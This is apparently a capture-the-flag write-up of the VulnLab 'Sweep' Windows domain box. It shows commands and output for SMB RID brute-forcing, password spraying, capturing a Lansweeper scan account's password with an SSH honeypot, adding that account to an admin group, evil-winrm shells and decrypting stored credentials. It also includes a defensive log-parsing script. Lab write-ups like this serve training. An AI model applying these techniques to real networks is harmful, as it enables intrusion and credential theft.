vulnlab-sweep

vulnlab sweep

A medium-difficulty Windows machine.

Tools used: crackmapexec, bloodhound-python, sshesame, evil-winrm

Nmap scan

# Nmap 7.93 scan initiated Mon Jun 17 13:02:37 2024 as: nmap -Pn -sV -oN ports_sweep.txt 10.10.80.128
Nmap scan report for 10.10.80.128
Host is up (0.022s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
81/tcp   open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
82/tcp   open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-06-17 17:02:48Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
5357/tcp open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 17 13:03:09 2024 -- 1 IP address (1 host up) scanned in 32.44 seconds

Enumerate

Brute Force SMB

┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ crackmapexec smb 10.10.80.128 -u 'Guest' -p '' --shares --rid-brute
SMB         10.10.80.128    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.80.128    445    INVENTORY        [+] sweep.vl\Guest: 
SMB         10.10.80.128    445    INVENTORY        [+] Enumerated shares
SMB         10.10.80.128    445    INVENTORY        Share           Permissions     Remark
SMB         10.10.80.128    445    INVENTORY        -----           -----------     ------
SMB         10.10.80.128    445    INVENTORY        ADMIN$                          Remote Admin
SMB         10.10.80.128    445    INVENTORY        C$                              Default share
SMB         10.10.80.128    445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.10.80.128    445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.10.80.128    445    INVENTORY        Lansweeper$                     Lansweeper Actions
SMB         10.10.80.128    445    INVENTORY        NETLOGON                        Logon server share 
SMB         10.10.80.128    445    INVENTORY        SYSVOL                          Logon server share 
SMB         10.10.80.128    445    INVENTORY        [+] Brute forcing RIDs
SMB         10.10.80.128    445    INVENTORY        498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        500: SWEEP\Administrator (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        501: SWEEP\Guest (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        502: SWEEP\krbtgt (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        512: SWEEP\Domain Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        513: SWEEP\Domain Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        514: SWEEP\Domain Guests (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        515: SWEEP\Domain Computers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        516: SWEEP\Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        517: SWEEP\Cert Publishers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        518: SWEEP\Schema Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        525: SWEEP\Protected Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        526: SWEEP\Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1113: SWEEP\jgre808 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1114: SWEEP\bcla614 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1115: SWEEP\hmar648 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1116: SWEEP\jgar931 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1117: SWEEP\fcla801 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1118: SWEEP\jwil197 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1119: SWEEP\grob171 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1120: SWEEP\fdav736 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1121: SWEEP\jsmi791 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1122: SWEEP\hjoh690 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1125: SWEEP\intern (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        3101: SWEEP\Lansweeper Discovery (SidTypeGroup)

Make a users file from the RID-brute output and spray it with username=password:

cat allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt
crackmapexec smb sweep.vl -u users.txt -p users.txt --shares --continue-on-success

Bloodhound Enum

┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ bloodhound-python -d sweep.vl -c All -dc inventory.sweep.vl -ns 10.10.80.128 -u intern -p intern --zip
INFO: Found AD domain: sweep.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 17 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: inventory.sweep.vl
INFO: Done in 00M 06S
INFO: Compressing output into 20240617132345_bloodhound.zip

Log in to the Lansweeper web interface at http://sweep.vl:81/ as user intern. Go to Scanning -> Scanning credentials (note that saved credentials exist), then Scanning -> Scanning targets -> add an IP range target containing your VulnLab VPN IP, and select the saved credentials for it.

On the Kali machine, run an SSH honeypot. I used sshesame; the only thing that needs changing in sshesame.yaml is listen_address, which I set to 10.8.2.138:22 (the VPN IP in my case).

┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ ./sshesame-linux-amd64 --config sshesame.yaml
INFO 2024/06/17 14:52:02 No host keys configured, using keys at "/home/puck/.local/share/sshesame"
INFO 2024/06/17 14:52:02 Listening on 10.8.2.138:22
WARNING 2024/06/17 14:53:40 Failed to accept connection: Failed to establish SSH server connection: EOF
WARNING 2024/06/17 14:53:46 Failed to accept connection: Failed to establish SSH server connection: ssh: disconnect, reason 11: Session closed
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" without credentials rejected
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" with password "0|5<REDACTED>" accepted
2024/06/17 14:53:46 [10.10.80.128:51633] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] session requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] command "uname" requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] closed
2024/06/17 14:53:46 [10.10.80.128:51633] connection closed
2024/06/17 14:53:47 [10.10.80.128:51634] authentication for user "svc_inventory_lnx" without credentials rejected
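As an added example (not from the original writeup) of reading the honeypot capture from the blue side: this Python script parses sshesame log lines in the layout shown above, using constructed sample lines with a placeholder password, and reports which accounts a scanner presented a password for, from which source IP and with which client banner, without keeping the password itself. It assumes sshesame's default log line format as seen in the capture.

```python
import re
from collections import defaultdict

# Constructed sample in sshesame's log format (not the page's capture); password is a placeholder.
SAMPLE_LOG = """\
INFO 2024/06/17 14:52:02 Listening on 10.8.2.138:22
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" without credentials rejected
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" with password "placeholder-pw" accepted
2024/06/17 14:53:46 [10.10.80.128:51633] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] command "uname" requested
2024/06/17 14:53:46 [10.10.80.128:51633] connection closed
2024/06/17 14:53:47 [10.10.80.128:51634] authentication for user "svc_inventory_lnx" without credentials rejected
"""

# Event lines carry "[src:port]"; INFO/WARNING daemon lines do not and are skipped.
LINE_RE = re.compile(r'^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \[(?P<src>[^\]]+)\] (?P<msg>.*)$')
# Only attempts that actually presented a password count as a credential exposure.
AUTH_RE = re.compile(r'authentication for user "(?P<user>[^"]*)" with password "[^"]*" (?P<result>accepted|rejected)')
CLIENT_RE = re.compile(r'connection with client version "(?P<client>[^"]*)" established')
CMD_RE = re.compile(r'command "(?P<cmd>[^"]*)" requested')


def parse_sshesame(text):
    """Per source IP: (user, result) pairs that presented a password, client banners, commands run."""
    report = defaultdict(lambda: {"password_auths": set(), "clients": set(), "commands": []})
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        entry = report[m.group("src").rsplit(":", 1)[0]]  # drop the ephemeral source port
        msg = m.group("msg")
        a, c, k = AUTH_RE.search(msg), CLIENT_RE.search(msg), CMD_RE.search(msg)
        if a:
            entry["password_auths"].add((a.group("user"), a.group("result")))
        elif c:
            entry["clients"].add(c.group("client"))
        elif k:
            entry["commands"].append(k.group("cmd"))
    return dict(report)


def leaked_accounts(report):
    """Flatten to (src_ip, user, client banner) for every account a source handed a password for."""
    out = []
    for src_ip, entry in sorted(report.items()):
        client = ", ".join(sorted(entry["clients"])) or "unknown"
        for user, _result in sorted(entry["password_auths"]):
            out.append((src_ip, user, client))
    return out


if __name__ == "__main__":
    for src_ip, user, client in leaked_accounts(parse_sshesame(SAMPLE_LOG)):
        print(f"{src_ip} presented a password for {user!r} via {client}")
```

A scanner that offers a domain service account's password to any SSH listener in its target range is the exposure this writeup exploits; the same parser on a real honeypot log shows which accounts and scan hosts are affected.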

Now log on to http://sweep.vl:81/Default.aspx as user svc_inventory_lnx

and carry on with that account's higher privileges,

or, more simply, after adding svc_inventory_lnx to the "Lansweeper Admins" group.

Unintended way: https://github.com/Yeeb1/SharpLansweeperDecrypt

But first, as BloodHound suggests:

Full control of a group allows you to directly modify group membership of the group.

Use Samba's net tool to add the user to the target group. The credentials can be supplied in cleartext or prompted interactively if omitted from the command line:

┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ net rpc group addmem "Lansweeper Admins" "svc_inventory_lnx" -U SWEEP/svc_inventory_lnx -S inventory.sweep.vl
Password for [SWEEP\svc_inventory_lnx]:

Then WinRM to the box:

┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ evil-winrm -i sweep.vl -u 'svc_inventory_lnx' -p '0|5<REDACTED>'

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\temp> upload LansweeperDecrypt.ps1
                                        
Info: Uploading /home/puck/vulnlab/sweep/LansweeperDecrypt.ps1 to C:\temp\LansweeperDecrypt.ps1
                                        
Data: 5700 bytes of 5700 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> ./LansweeperDecrypt.ps1
[+] Loading web.config file...
[+] Found protected connectionStrings section. Decrypting...
[+] Decrypted connectionStrings section:
<connectionStrings>
    <add name="lansweeper" connectionString="Data Source=(localdb)\.\LSInstance;Initial Catalog=lansweeperdb;Integrated Security=False;User ID=lansweeperuser;Password=Uk<REDACTED>;Connect Timeout=10;Application Name=&quot;LsService Core .Net SqlClient Data Provider&quot;" providerName="System.Data.SqlClient" />
</connectionStrings>
[+] Opening connection to the database...
[+] Retrieving credentials from the database...
[+] Decrypting password for user: SNMP Community String
[+] Decrypting password for user:
[+] Decrypting password for user: SWEEP\svc_inventory_win
[+] Decrypting password for user: svc_inventory_lnx
[+] Credentials retrieved and decrypted successfully:

CredName          Username                Password
--------          --------                --------
SNMP-Private      SNMP Community String   private
Global SNMP                               public
Inventory Windows SWEEP\svc_inventory_win 4^5<REDACTED>
Inventory Linux   svc_inventory_lnx       0|5<REDACTED>

Then WinRM to the box as admin (svc_inventory_win):

┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ evil-winrm -i sweep.vl -u 'SWEEP\svc_inventory_win' -p '4^5<REDACTED>'

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_inventory_win\Documents>
